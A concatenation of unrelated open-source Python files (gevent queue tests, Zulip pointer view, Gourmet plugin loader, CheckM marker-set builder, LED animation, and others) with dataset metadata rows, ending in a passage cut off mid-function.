result.append(func(*args))
assert q.empty(), q
assert not q.full(), q
gevent.sleep(0.001)
assert q.empty(), q
assert not q.full(), q
get_hub().loop.run_callback(store_result, q.put_nowait, 10)
assert not p.ready(), p
gevent.sleep(0.001)
assert result == [None], result
assert p.ready(), p
assert not q.full(), q
assert q.empty(), q
class TestJoinEmpty(TestCase):
def test_issue_45(self):
"""Test that join() exits immediatelly if not jobs were put into the queue"""
self.switch_expected = False
q = queue.JoinableQueue()
q.join()
def make_get_interrupt(queue_type):
class TestGetInterrupt(GenericGetTestCase):
Timeout = Empty
def wait(self, timeout):
return queue_type().get(timeout=timeout)
TestGetInterrupt.__name__ += '_' + queue_type.__name__
return TestGetInterrupt
for queue_type in [queue.Queue, queue.JoinableQueue, queue.LifoQueue, queue.PriorityQueue, queue.Channel]:
klass = make_get_interrupt(queue_type)
globals()[klass.__name__] = klass
del klass, queue_type
def make_put_interrupt(queue):
class TestPutInterrupt(GenericGetTestCase):
Timeout = Full
def wait(self, timeout):
while not queue.full():
queue.put(1)
return queue.put(2, timeout=timeout)
TestPutInterrupt.__name__ += '_' + queue.__class__.__name__
return TestPutInterrupt
for obj in [queue.Queue(1), queue.JoinableQueue(1), queue.LifoQueue(1), queue.PriorityQueue(1), queue.Channel()]:
klass = make_put_interrupt(obj)
globals()[klass.__name__] = klass
del klass, obj
del GenericGetTestCase
if __name__ == '__main__':
main()
| gpl-2.0 | 488,388,398,618,766,660 | 27.033419 | 113 | 0.546905 | false | 3.757753 | true | false | false |
lig/i18n-string | i18n_string.py | 1 | 1420 | from collections import Mapping
from locale import getdefaultlocale, normalize
def normalize_lang(lang):
return normalize(lang).split('.')[0]
def get_default_lang():
return getdefaultlocale()[0]
class LocaleDict(dict):
def __new__(cls, data=None):
self = dict.__new__(cls)
if data:
if not isinstance(data, Mapping):
raise ValueError(
'Initial data must be instance of any mapping')
for k, v in data.items():
self[normalize_lang(k)] = unicode(v)
return self
def __init__(self, *args, **kwargs):
pass
def __getitem__(self, key):
return super(LocaleDict, self).__getitem__(normalize_lang(key))
def __setitem__(self, key, value):
return super(LocaleDict, self).__setitem__(
normalize_lang(key), unicode(value))
class MultilingualString(unicode):
def __new__(cls, translations=None, default_language=None):
language = (default_language and normalize_lang(default_language) or
get_default_lang())
translations = LocaleDict(translations)
value = translations.get(language, u'')
self = unicode.__new__(cls, value)
self.language = language
self.translations = translations
return self
def translate(self, language):
return self.__class__(self.translations, language)
| bsd-2-clause | -1,428,376,439,097,220,900 | 25.792453 | 76 | 0.607042 | false | 4.396285 | false | false | false |
rishig/zulip | zerver/views/pointer.py | 1 | 1173 |
from django.http import HttpRequest, HttpResponse
from django.utils.translation import ugettext as _
from zerver.decorator import to_non_negative_int
from zerver.lib.actions import do_update_pointer
from zerver.lib.request import has_request_variables, JsonableError, REQ
from zerver.lib.response import json_success
from zerver.models import UserProfile, get_usermessage_by_message_id
def get_pointer_backend(request: HttpRequest, user_profile: UserProfile) -> HttpResponse:
return json_success({'pointer': user_profile.pointer})
@has_request_variables
def update_pointer_backend(request: HttpRequest, user_profile: UserProfile,
pointer: int=REQ(converter=to_non_negative_int)) -> HttpResponse:
if pointer <= user_profile.pointer:
return json_success()
if get_usermessage_by_message_id(user_profile, pointer) is None:
raise JsonableError(_("Invalid message ID"))
request._log_data["extra"] = "[%s]" % (pointer,)
update_flags = (request.client.name.lower() in ['android', "zulipandroid"])
do_update_pointer(user_profile, request.client, pointer, update_flags=update_flags)
return json_success()
| apache-2.0 | 5,036,255,552,979,921,000 | 42.444444 | 92 | 0.737425 | false | 3.949495 | false | false | false |
kirienko/gourmet | src/gourmet/plugin_loader.py | 1 | 16825 | import glob
import logging
import os.path
import sys
import traceback
from typing import Dict, List
import pkg_resources
from gourmet import gglobals
from gourmet.prefs import Prefs
from .defaults.defaults import loc
from .gdebug import debug
PRE = 0
POST = 1
try:
current_path = os.path.split(os.path.join(os.getcwd(), __file__))[0]
except IndexError:
current_path = ''
class MasterLoader:
"""This module provides a base class for loading plugins. Everything
that is plug-in-able in Gourmet should subclass the plugin loader.
Everything that is a plugin needs to provide a python module with a plugins
attribute containing the plugin classes that make up the plugin.
In addition, we need a .gourmet-plugin configuration file pointing to the
module (with the module parameter) and giving the name and comment for the
plugin.
"""
__single = None
default_active_plugin_sets = [
# tools
'unit_converter',
'duplicate_finder',
'spellcheck',
# import/export
'gxml_plugin',
'html_plugin',
'mastercook_import_plugin',
'mealmaster_plugin',
'archive_plugin',
'pdf_plugin',
'plaintext_plugin',
'web_import_plugin',
'website_import_plugins',
'krecipe_plugin',
'mycookbook_plugin',
'epub_plugin',
'copy_paste_plugin'
]
@classmethod
def instance(cls):
if MasterLoader.__single is None:
MasterLoader.__single = MasterLoader()
return MasterLoader.__single
def __init__(self):
# TODO!!! Discover plugins using namespace packages(?)
# If gourmet is running as a built (i.e., non-source) distribution,
# this is probably not going to work with bundled plugins.
self.plugin_directories = [
# user plug-ins
os.path.join(gglobals.gourmetdir, 'plugins'),
# bundled plugins
os.path.join(current_path, 'plugins'),
os.path.join(current_path, 'plugins', 'import_export'),
]
self.errors = dict()
self.pluggables_by_class: Dict = dict()
self.active_plugin_sets: List[str] = []
self.available_plugin_sets: Dict[str, LegacyPlugin] = self.load_legacy_plugins(self.plugin_directories) # noqa
self.available_plugin_sets.update(self.load_plugins_from_namespace())
self.load_active_plugins()
@staticmethod
def load_legacy_plugins(directories: List[str]) -> Dict[str, object]:
"""Look through plugin directories for legacy gourmet-plugins."""
ret: Dict[str, object] = {}
for d in directories:
debug('Loading plugins from %s'%os.path.realpath(d),1)
plugins = glob.glob(os.path.join(d, '*.gourmet-plugin'))
for ppath in plugins:
debug('Found %s'%ppath,1)
plugin_set = LegacyPlugin(ppath)
if plugin_set.module in ret.keys():
print('Ignoring duplicate plugin ',plugin_set.module,'found in ',ppath)
else:
ret[plugin_set.module] = plugin_set
return ret
@staticmethod
def load_plugins_from_namespace() -> Dict[str, object]:
"""Look for plugins in the gourmet.plugins namespace."""
debug('Loading plugins from namespace', 1)
exporters = list(pkg_resources.iter_entry_points('gourmet.plugins.exporters'))
file_importers = list(pkg_resources.iter_entry_points('gourmet.plugins.fileimporters'))
web_importers = list(pkg_resources.iter_entry_points('gourmet.plugins.webimporters'))
ret: Dict[str, object] = {}
for entrypoint in exporters:
try:
plugin = entrypoint.load()
except BaseException as e: # ModuleNotFoundError, ImportError, etc.
print(f'Could not load plugin {entrypoint}: {e}')
else:
ret[entrypoint.name] = Plugin(plugin)
return ret
def load_active_plugins(self):
"""Enable plugins that were previously saved to the preferences"""
prefs = Prefs.instance()
self.active_plugin_sets = prefs.get(
'plugins',
list(self.default_active_plugin_sets))
self.active_plugins = []
self.instantiated_plugins = {}
for p in self.active_plugin_sets:
if p in self.available_plugin_sets:
try:
self.active_plugins.extend(self.available_plugin_sets[p].plugins)
except:
print('WARNING: Failed to load plugin %s'%p)
self.errors[p] = traceback.format_exc()
logging.exception('')
else:
print('Plugin ',p,'not found')
def save_active_plugins(self):
prefs = Prefs.instance()
prefs['plugins'] = self.active_plugin_sets
prefs.save()
def check_dependencies(self, plugin_set):
if plugin_set.dependencies:
missing = []
depends = plugin_set.dependencies or []
for dep in depends:
if not dep in self.active_plugin_sets:
missing.append(dep)
if missing:
raise DependencyError(plugin_set,missing)
def check_if_depended_upon (self, plugin_set):
"""Return a list of active plugin set objects that depend on
plugin_set.
"""
depending_on_me = []
for module in self.active_plugin_sets:
if module in self.available_plugin_sets:
ps = self.available_plugin_sets[module]
if ps.dependencies:
try:
if plugin_set.module in ps.dependencies:
depending_on_me.append(ps)
except:
print('Problem checking dependencies of ',ps,ps.Dependencies)
raise
return depending_on_me
def activate_plugin_set(self, plugin_set: 'LegacyPlugin'):
"""Activate a set of plugins.
"""
if plugin_set in self.active_plugin_sets:
return
self.check_dependencies(plugin_set)
# plugin_set.get_module() returns None if there's been a
# problem -- we want to raise that problem now.
if plugin_set.get_module() is None:
e = plugin_set.error
self.errors[plugin_set] = f"{type(e).__name__}: {e}"
raise e
self.active_plugin_sets.append(plugin_set.module)
self.active_plugins.extend(plugin_set.plugins)
for plugin in plugin_set.plugins:
for klass in list(self.pluggables_by_class.keys()):
if issubclass(plugin,klass):
for pluggable in self.pluggables_by_class[klass]:
pluggable.plugin_plugin(self.get_instantiated_plugin(plugin))
def deactivate_plugin_set (self, plugin_set: 'LegacyPlugin'):
# Deactivate any plugin sets that depend upon us...
for ps in self.check_if_depended_upon(plugin_set):
self.deactivate_plugin_set(ps)
if plugin_set.module in self.active_plugin_sets:
self.active_plugin_sets.remove(plugin_set.module)
else:
print('Odd',plugin_set.module,'is not listed as active.')
if plugin_set.get_module():
for plugin in plugin_set.plugins:
for klass in list(self.pluggables_by_class.keys()):
if issubclass(plugin,klass):
for pluggable in self.pluggables_by_class[klass]:
plugin().deactivate(pluggable)
if plugin in self.instantiated_plugins:
self.instantiated_plugins[plugin].remove()
self.active_plugins.remove(plugin)
def get_instantiated_plugin (self, plugin):
if plugin in self.instantiated_plugins:
return self.instantiated_plugins[plugin]
else:
debug('Instantiate %s from %s'%(plugin,
plugin.__module__),
1)
self.instantiated_plugins[plugin] = plugin()
return self.instantiated_plugins[plugin]
def register_pluggable (self, pluggable, klass):
if klass not in self.pluggables_by_class:
self.pluggables_by_class[klass] = []
self.pluggables_by_class[klass].append(pluggable)
for p in self.active_plugins:
if issubclass(p,klass):
try:
plugin_instance = self.get_instantiated_plugin(p)
except:
print('WARNING: Failed to instantiate plugin %s of type %s'%(p,klass))
self.errors[p] = traceback.format_exc()
traceback.print_exc()
else:
pluggable.plugin_plugin(plugin_instance)
def unregister_pluggable (self, pluggable, klass):
self.pluggables_by_class[klass].remove(pluggable)
class Plugin:
"""Load a plugin from the gourmet-plugins namespace."""
def __init__(self, plugin_class: type):
self.props = dict.fromkeys(
['Name', 'Comment', 'Authors', 'Version', 'API_Version', 'Website',
'Copyright','Dependencies'])
self._loaded = plugin_class
self.name = plugin_class.__name__
self.comment = self._loaded.__doc__.split('\n')[0]
self.authors = plugin_class.AUTHOR
self.api_version = 2.0
self.copyright = plugin_class.COPYRIGHT
self.website = plugin_class.WEBSITE
attrs = pkg_resources.require(self.name)[0]
self.version = attrs.version
# The following is a backward compatibility hack: pip took care to
# install the plugin and its dependencies.
# Moreover, Gtk bindings are packaged as pygobject but installed as gi.
# We have it anyway.
self.dependencies = [r.name for r in attrs.requires()]
self.dependencies.remove('pygobject')
self.module = plugin_class.__module__
self.plugins = [plugin_class]
def get_module(self):
return self._loaded
class LegacyPlugin:
"""A lazy-loading set of plugins.
This class encapsulates what to the end-user is a plugin.
From our perspective, plugins can really be a bundle of plugins --
for example, your plugin might require a DatabasePlugin, a
RecCardDisplayPlugin and a MainPlugin to function.
"""
_loaded = None
def __init__(self, plugin_info_path: str):
with open(plugin_info_path, 'r') as fin:
self.load_plugin_file_data(fin)
self.curdir, plugin_info_file = os.path.split(plugin_info_path)
self.plugin_modules_dir = os.path.join(os.path.dirname(__file__),
'plugins')
self.import_export_modules_dir = os.path.join(self.plugin_modules_dir,
'import_export')
self.module = self.props['Module']
def get_module(self):
if self._loaded is not None:
return self._loaded
else:
if self.curdir not in sys.path:
sys.path.append(self.curdir)
if self.plugin_modules_dir not in sys.path:
sys.path.append(self.plugin_modules_dir)
if self.import_export_modules_dir not in sys.path:
sys.path.append(self.import_export_modules_dir)
try:
self._loaded = __import__(self.module)
except ImportError as ie:
print('WARNING: Plugin module import failed')
print('PATH:', sys.path)
traceback.print_exc()
self.error = ie
return None
else:
return self._loaded
def __getattr__ (self, attr):
if attr == 'plugins':
return self.get_plugins()
elif attr in self.props:
return self.props[attr]
elif attr.capitalize() in self.props:
return self.props[attr.capitalize()]
raise AttributeError
def get_plugins(self):
return self.get_module().plugins
def load_plugin_file_data (self,plugin_info_file):
# This should really use GKeyFile but there are no python
# bindings that I can find atm. One possibility would be to
# use this:
# http://svn.async.com.br/cgi-bin/viewvc.cgi/kiwi/trunk/kiwi/desktopparser.py?revision=7336&view=markup
self.props = dict.fromkeys(
['Name', 'Comment', 'Authors', 'Version', 'API_Version',
'Website', 'Copyright', 'Dependencies'])
for line in plugin_info_file.readlines():
if '[Gourmet Plugin]' in line:
pass
elif line.find('=')>0:
key,val = line.split('=')
key = key.strip(); val = val.strip()
key = key.strip('_')
if (loc is not None) and ('[' in key):
key,locale = key.strip(']').split('[')
if locale==loc:
self.props[key] = val
elif locale[:2]==loc[:2]:
self.props[key] = val
else:
self.props[key]=val
else:
print('Ignoring line',line)
if self.dependencies:
self.props['Dependencies'] = [d.strip() for d in self.dependencies.split(',')]
class Pluggable:
"""A plugin-able class."""
def __init__ (self, plugin_klasses):
"""plugin_klasses is the list class of which each of our
plugins should be a sub-class.
A pluggable can take multiple types of sub-classes if it
likes.
"""
#print 'Pluggable.__init__([',plugin_klasses,'])'
self.pre_hooks = {} # stores hooks to be run before methods by
# method name
self.post_hooks = {} # stores hooks to be run after methods by
# method name
self.loader = MasterLoader.instance()
self.klasses = plugin_klasses
self.plugins = []
for klass in self.klasses:
#print 'register self ',self,'as pluggable for ',klass
self.loader.register_pluggable(self,klass)
def plugin_plugin (self, plugin_instance):
try:
self.plugins.append(plugin_instance)
plugin_instance.activate(self)
except:
print('WARNING: PLUGIN FAILED TO LOAD',plugin_instance)
traceback.print_exc()
def destroy (self):
self.loader.unregister_pluggable(self,self.klass)
for pi in self.plugins:
pi.deactivate(self)
def run_pre_hook (self, fname, *args, **kwargs):
for hook in self.pre_hooks.get(fname,[]):
try:
new_args,new_kwargs = hook(self,*args,**kwargs)
assert(isinstance(args,tuple))
assert(isinstance(kwargs,dict))
except:
print('WARNING',hook,'did not return args,kwargs')
else:
args,kwargs = new_args,new_kwargs
return args,kwargs
def run_post_hook (self, fname, retval, *args, **kwargs):
for hook in self.post_hooks.get(fname,[]):
retval = hook(retval,self,*args,**kwargs)
return retval
def add_hook (self, type, name, hook):
if type==PRE: hookdic = self.pre_hooks
else: hookdic = self.post_hooks
if name not in hookdic:
hookdic[name] = []
hookdic[name].append(hook)
def remove_hook (self, type, name, hook):
if type==PRE: hookdic = self.pre_hooks
else: hookdic = self.post_hooks
hookdic.pop(name, None)
def get_plugin_by_module (self, module):
for p in self.plugins:
if p.__module__ == module:
return p
class DependencyError (Exception):
def __init__ (self, pluginset, missing_dependencies):
self.plugin_set = pluginset
self.dependencies = missing_dependencies
print(self.plugin_set,'requires but did not find',self.dependencies)
def __repr__ (self):
return ('<DependencyError '
+ repr(self.plugin_set)
+ ' missing required dependencies '
+ repr(self.dependencies)
)
def pluggable_method (f):
def _ (self, *args, **kwargs):
'''Run hooks around method'''
args,kwargs = self.run_pre_hook(f.__name__,*args,**kwargs)
retval = f(self,*args,**kwargs)
retval = self.run_post_hook(f.__name__,retval,*args,**kwargs)
return retval
return _
| gpl-2.0 | -8,503,242,675,846,742,000 | 36.979684 | 119 | 0.571352 | false | 4.193669 | false | false | false |
seejay/feedIO | feedio/purify.py | 1 | 2483 | #!/usr/bin/python
"""
A piece of code to do the required manipulation tasks for feedIO.
currently provides,
cleanText() function to clear any tags and make a text readable.
shorten() function to short a long text into a predefined size.
To be used with the feedIO tts feature and for classification of the article text.
TODO: find better ways to do this.
"""
__version__ = "0.0.5"
__license__ = """
Copyright (C) 2011 Sri Lanka Institute of Information Technology.
feedIO is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
feedIO is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with feedIO. If not, see <http://www.gnu.org/licenses/>.
"""
__author__ = "Chanaka Jayamal <[email protected]>"
__developers__ = ["Chanaka Jayamal",
"Lanka Amarasekara",
"Kolitha Gajanayake",
"Chamika Viraj"]
import HTMLParser
import tinyurl
SHORTEN_LENGTH = 100
class Purify(HTMLParser.HTMLParser):
def __init__(self):
self.reset()
self.fed = []
def handle_data(self, d):
self.fed.append(d)
def getData(self):
return ''.join(self.fed)
# Function to clen an article text.
def cleanText(text):
"""
function to clear any tags and make a text readable.
"""
p= Purify()
p.feed(text)
data = p.getData()
data = data.strip()
# remove the trailing "More" link appears in some feeds.
stripped = data.strip("\tMore")
#to fix the UnicodeEncodeError exception that occurs in some texts
stripped = stripped.encode('utf8')
return stripped
#function to summarize a text to be given a sneak peak.
def shorten(text, numChars=SHORTEN_LENGTH):
"""
function to short a long text into a predefined size.
"""
info = (text[:numChars] + '..') if len(text) > numChars else text
return info
def shortenUrl(url):
"""
function to shorten a long Url.
"""
try:
shortUrl = tinyurl.create_one(url)
except:
return False
return shortUrl
| gpl-3.0 | -7,916,118,449,881,894,000 | 26.285714 | 82 | 0.664116 | false | 3.879688 | false | false | false |
fw1121/CheckM | scripts/createTaxonomicSpecificMarkerSets.py | 3 | 10651 | #!/usr/bin/env python
###############################################################################
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
__prog_name__ = 'TaxonomicMarkerSets'
__prog_desc__ = 'create taxonomic-specific marker sets'
__author__ = 'Donovan Parks'
__copyright__ = 'Copyright 2013'
__credits__ = ['Donovan Parks']
__license__ = 'GPL3'
__version__ = '0.0.1'
__maintainer__ = 'Donovan Parks'
__email__ = '[email protected]'
__status__ = 'Development'
import os
import sys
import argparse
import multiprocessing as mp
from checkm.util.img import IMG
from checkm.util.taxonomyUtils import rankPrefixes, ranksByLevel
from lib.markerSetBuilder import MarkerSetBuilder
class TaxonomicMarkerSets(object):
def __init__(self):
pass
def __workerThread(self, ubiquityThreshold, singleCopyThreshold,
minGenomes,
colocatedDistThreshold, colocatedGenomeThreshold,
metadata,
queueIn, queueOut):
"""Process each data item in parallel."""
img = IMG('/srv/whitlam/bio/db/checkm/img/img_metadata.tsv', '/srv/whitlam/bio/db/checkm/pfam/tigrfam2pfam.tsv')
markerSetBuilder = MarkerSetBuilder()
while True:
lineage = queueIn.get(block=True, timeout=None)
if lineage == None:
break
if lineage == 'Universal':
genomeIds = img.genomeIdsByTaxonomy('prokaryotes', metadata)
else:
genomeIds = img.genomeIdsByTaxonomy(lineage, metadata)
if len(genomeIds) >= minGenomes:
markerSet = markerSetBuilder.buildMarkerSet(genomeIds, ubiquityThreshold, singleCopyThreshold, colocatedDistThreshold)
colocatedSets = markerSet.markerSet
else:
colocatedSets = None
# allow results to be processed or written to file
queueOut.put((lineage, colocatedSets, len(genomeIds)))
def __writerThread(self, pfamIdToPfamAcc,
ubiquityThreshold, singleCopyThreshold,
colocatedDistThreshold, colocatedGenomeThreshold,
outputDir, numDataItems, writerQueue):
"""Store or write results of worker threads in a single thread."""
#taxonSetOut = open(os.path.join('..', 'data', 'taxon_marker_sets.tsv'), 'w')
taxonSetOut = open(os.path.join('.', 'data', 'taxon_marker_sets.tsv'), 'w')
processedItems = 0
while True:
lineage, colocatedSets, numGenomes = writerQueue.get(block=True, timeout=None)
if lineage == None:
break
processedItems += 1
statusStr = 'Finished processing %d of %d (%.2f%%) lineages.' % (processedItems, numDataItems, float(processedItems)*100/numDataItems)
sys.stdout.write('%s\r' % statusStr)
sys.stdout.flush()
if colocatedSets != None:
taxonomy = [x.strip() for x in lineage.split(';')]
rankPrefix = rankPrefixes[len(taxonomy)-1]
cladeName = taxonomy[-1].strip().replace(' ', '_')
fout = open(os.path.join(outputDir, rankPrefix + cladeName + '.txt'), 'w')
fout.write('# Taxonomic Marker Set\n')
fout.write('LINEAGE\t' + lineage + '\n')
fout.write('GENOME\t' + str(numGenomes) + '\n')
fout.write('UBIQUITY\t' + str(ubiquityThreshold) + '\n')
fout.write('SINGLE_COPY\t' + str(singleCopyThreshold) + '\n')
fout.write('COLOCATED_DISTANCE\t' + str(colocatedDistThreshold) + '\n')
fout.write('COLOCATED_GENOME_PERCENTAGE\t' + str(colocatedGenomeThreshold) + '\n')
# change model names to accession numbers, and make
# sure there is an HMM model for each PFAM
mungedColocatedSets = []
setSizes = []
for geneSet in colocatedSets:
s = set()
for geneId in geneSet:
if 'pfam' in geneId:
pfamId = geneId.replace('pfam', 'PF')
if pfamId in pfamIdToPfamAcc:
s.add(pfamIdToPfamAcc[pfamId])
else:
s.add(geneId)
setSizes.append(len(s))
mungedColocatedSets.append(s)
fout.write(str(mungedColocatedSets))
fout.close()
# write out single taxonomic-specific marker set file
numMarkerGenes = 0
for m in mungedColocatedSets:
numMarkerGenes += len(m)
taxon = taxonomy[-1]
if len(taxonomy) == 7:
taxon = taxonomy[5] + ' ' + taxonomy[6]
maxSetSize = max(setSizes)
avgSetSize = float(sum(setSizes))/len(setSizes)
taxonSetOut.write(ranksByLevel[len(taxonomy)-1] + '\t' + taxon + '\t' + lineage + '\t' + str(numGenomes) + '\t' + str(numMarkerGenes) + '\t' + str(len(mungedColocatedSets)) + '\t' + str(maxSetSize) + '\t' + str(avgSetSize) + '\t' + str(mungedColocatedSets) + '\n')
sys.stdout.write('\n')
taxonSetOut.close()
def __pfamIdToPfamAcc(self, img):
pfamIdToPfamAcc = {}
for line in open('/srv/whitlam/bio/db/pfam/27/Pfam-A.hmm'):
if 'ACC' in line:
acc = line.split()[1].strip()
pfamId = acc.split('.')[0]
pfamIdToPfamAcc[pfamId] = acc
return pfamIdToPfamAcc
def run(self, outputDir, ubiquityThreshold, singleCopyThreshold, minGenomes, colocatedDistThreshold, colocatedGenomeThreshold, threads):
if not os.path.exists(outputDir):
os.makedirs(outputDir)
# determine lineages to process
img = IMG('/srv/whitlam/bio/db/checkm/img/img_metadata.tsv', '/srv/whitlam/bio/db/checkm/pfam/tigrfam2pfam.tsv')
metadata = img.genomeMetadata()
lineages = img.lineagesSorted(metadata)
lineages.append('Universal')
# determine HMM model accession numbers
pfamIdToPfamAcc = self.__pfamIdToPfamAcc(img)
# populate worker queue with data to process
workerQueue = mp.Queue()
writerQueue = mp.Queue()
for lineage in lineages:
workerQueue.put(lineage)
for _ in range(threads):
workerQueue.put(None)
workerProc = [mp.Process(target = self.__workerThread, args = (ubiquityThreshold, singleCopyThreshold,
minGenomes,
colocatedDistThreshold, colocatedGenomeThreshold,
metadata,
workerQueue, writerQueue)) for _ in range(threads)]
writeProc = mp.Process(target = self.__writerThread, args = (pfamIdToPfamAcc,
ubiquityThreshold, singleCopyThreshold,
colocatedDistThreshold, colocatedGenomeThreshold,
outputDir, len(lineages), writerQueue))
writeProc.start()
for p in workerProc:
p.start()
for p in workerProc:
p.join()
writerQueue.put((None, None, None))
writeProc.join()
if __name__ == '__main__':
print __prog_name__ + ' v' + __version__ + ': ' + __prog_desc__
print ' by ' + __author__ + ' (' + __email__ + ')' + '\n'
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('output_dir', help='output directory')
parser.add_argument('-u', '--ubiquity', help='ubiquity threshold for defining marker set', type=float, default = 0.97)
parser.add_argument('-s', '--single_copy', help='single-copy threshold for defining marker set', type=float, default = 0.97)
parser.add_argument('-m', '--min_genomes', help='minimum genomes required to infer marker set', type=int, default = 2)
parser.add_argument('-d', '--distance_threshold', help='genomic distance to be considered co-located', type=float, default=5000)
parser.add_argument('-g', '--genome_threshold', help='percentage of genomes required to be considered co-located', type=float, default=0.95)
parser.add_argument('-t', '--threads', type=int, help='number of threads', default=1)
args = parser.parse_args()
try:
taxonomicMarkerSets = TaxonomicMarkerSets()
taxonomicMarkerSets.run(args.output_dir, args.ubiquity, args. single_copy, args.min_genomes, args.distance_threshold, args.genome_threshold, args.threads)
except SystemExit:
print "\nControlled exit resulting from an unrecoverable error or warning."
except:
print "\nUnexpected error:", sys.exc_info()[0]
raise
| gpl-3.0 | 5,907,076,798,651,764,000 | 47.413636 | 280 | 0.527181 | false | 4.219889 | false | false | false |
ScoffM/ITESO-Word2Vec | Salaries_Woeization.py | 1 | 3115 | import pandas as pd
import numpy as np
import math
import time
#Replace the nan values with the string True_nan in a dataframe's column
def eliminate_nan(col):
trueNan = pd.isnull(col)
indexs = trueNan[ trueNan == True].index.tolist()
col[indexs] = 'True_nan'
return col
#colnames is a list of names of the columns to be transformed
#Should either:
# a) Be ["ContractType", "ContractTime", "Category", "SourceName"]
# b) Pass data with only the above columns and use colnames.values
# The NaN's might have to be transformed before woeization can be completed.
#This function returns a dataframe with woe values just with the specified columns
def woeization(data, target_variable, colnames):
import numpy as np
import math
my_median = math.floor(data[target_variable].median())
true_all = sum(data[target_variable] >= my_median)
false_all = sum(data[target_variable] < my_median)
for x in range(len(colnames)):
#If the column has any nan value, the nan function is applies
if data[colnames[x]].isnull().values.any() == True:
data[colnames[x]] = eliminate_nan(data[colnames[x]])
xx = data[colnames[x]] # In each loop, set xx for an entire column
my_cat = np.unique(xx).tolist() # List of unique categories on my column xx
for y in range(len(my_cat)):
true = sum((xx == my_cat[y]) & (data[target_variable] >= my_median))
false = sum((xx == my_cat[y]) & (data[target_variable] < my_median))
# If the data is completely skewed towards a "side"
# Make it slightly larger than 0 to get out of the undefined zones of log(x) and 1/x
if true == 0:
true = 0.001
if false == 0:
false = 0.001
# Calcular WoE
true_per = float(true) / true_all
false_per = float(false) / false_all
div = float(true_per) / false_per
woe = math.log(div)
data.loc[data[colnames[x]] == my_cat[y], colnames[x]] = woe
data = data[(colnames + [target_variable])]
return data
# Run as standalone to get a modified dataframe, else import to get the modified features
def main():
global_start = time.time()
path = "data/Train_Rev1.csv"
target_variable = "SalaryNormalized"
colnames = ['ContractType', 'ContractTime', 'Category', 'SourceName']
def identity(x):
return x
# This allegedly increases speed in loading as it tells pandas to load thos oclumns as strings
converters = { "FullDescription" : identity
, "Title": identity
, "LocationRaw": identity
, "LocationNormalized": identity
}
print "Loading Data..."
data = pd.read_csv(path)
print "Done!"
print "Initializing Data Transformation"
data_woe= woeization(data=data, target_variable=target_variable, colnames=colnames)
data_woe.to_csv('data/WoE_Features.csv')
if __name__=="__main__":
main()
| gpl-3.0 | 3,483,683,236,759,404,000 | 39.533333 | 98 | 0.609952 | false | 3.721625 | false | false | false |
rec/BiblioPixelAnimations | BiblioPixelAnimations/matrix/pinwheel.py | 2 | 1351 | from bibliopixel.animation.matrix import Matrix
class Pinwheel(Matrix):
def __init__(self, layout, dir=True, **kwds):
super().__init__(layout, **kwds)
self._center = (self.width // 2, self.height // 2)
self._dir = dir
self._len = (self.width * 2) + (self.height * 2) - 2
def pre_run(self):
self._step = 0
def step(self, amt):
if self._dir:
s = 255 - self._step
else:
s = self._step
pos = 0
cX, cY = self._center
for x in range(self.width):
index = pos * 255 / self._len + s
self.layout.drawLine(cX, cY, x, 0, self.palette(index))
pos += 1
for y in range(self.height):
color = self.palette(pos * 255 / self._len + s)
self.layout.drawLine(cX, cY, self.width - 1, y, color)
pos += 1
for x in range(self.width - 1, -1, -1):
color = self.palette(pos * 255 / self._len + s)
self.layout.drawLine(cX, cY, x, self.height - 1, color)
pos += 1
for y in range(self.height - 1, -1, -1):
color = self.palette(pos * 255 / self._len + s)
self.layout.drawLine(cX, cY, 0, y, color)
pos += 1
self._step += amt
if(self._step >= 255):
self._step = 0
| mit | 3,571,952,326,134,889,000 | 29.022222 | 67 | 0.487047 | false | 3.385965 | false | false | false |
adamdoupe/enemy-of-the-state | jcc/jcc/python.py | 2 | 57348 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os, sys, platform, shutil, _jcc, py_compile
from cpp import PRIMITIVES, INDENT, HALF_INDENT
from cpp import cppname, cppnames, typename
from cpp import line, signature, find_method, split_pkg, sort
from cpp import Modifier
from _jcc import findClass
from config import INCLUDES, CFLAGS, DEBUG_CFLAGS, LFLAGS, SHARED
python_ver = '%d.%d.%d' %(sys.version_info[0:3])
if python_ver < '2.4':
from sets import Set as set
RESULTS = { 'boolean': 'Py_RETURN_BOOL(%s);',
'byte': 'return PyString_FromStringAndSize((char *) &%s, 1);',
'char': 'return PyUnicode_FromUnicode((Py_UNICODE *) &%s, 1);',
'double': 'return PyFloat_FromDouble((double) %s);',
'float': 'return PyFloat_FromDouble((double) %s);',
'int': 'return PyInt_FromLong((long) %s);',
'long': 'return PyLong_FromLongLong((PY_LONG_LONG) %s);',
'short': 'return PyInt_FromLong((long) %s);',
'java.lang.String': 'return j2p(%s);' }
CALLARGS = { 'boolean': ('O', '(%s ? Py_True : Py_False)', False),
'byte': ('O', 'PyString_FromStringAndSize((char *) &%s, 1)', True),
'char': ('O', 'PyUnicode_FromUnicode((Py_UNICODE *) &%s, 1)', True),
'double': ('d', '(double) %s', False),
'float': ('f', '(float) %s', False),
'int': ('i', '(int) %s', False),
'long': ('L', '(long long) %s', False),
'short': ('i', '(int) %s', False),
'java.lang.String': ('O', 'env->fromJString((jstring) %s)', True) }
def parseArgs(params, current):
def signature(cls):
array = ''
while cls.isArray():
array += '['
cls = cls.getComponentType()
clsName = cls.getName()
if cls.isPrimitive():
return array + PRIMITIVES[clsName]
